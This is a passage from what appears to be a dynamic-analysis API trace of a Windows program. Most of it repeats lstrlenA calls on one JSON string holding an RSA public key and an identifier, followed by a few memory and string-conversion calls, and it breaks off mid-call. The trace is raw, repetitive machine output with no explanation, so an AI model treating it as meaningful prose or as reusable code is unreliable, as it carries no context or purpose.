KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.837] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.838] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.838] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.838] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.838] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.838] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}" [0163.838] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aba448 | out: hHeap=0xcd0000) returned 1 [0163.838] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW\"}") returned 544 [0163.838] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x442) returned 0x369ea50 [0163.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9f5a778, cbMultiByte=-1, lpWideCharStr=0x369ea50, 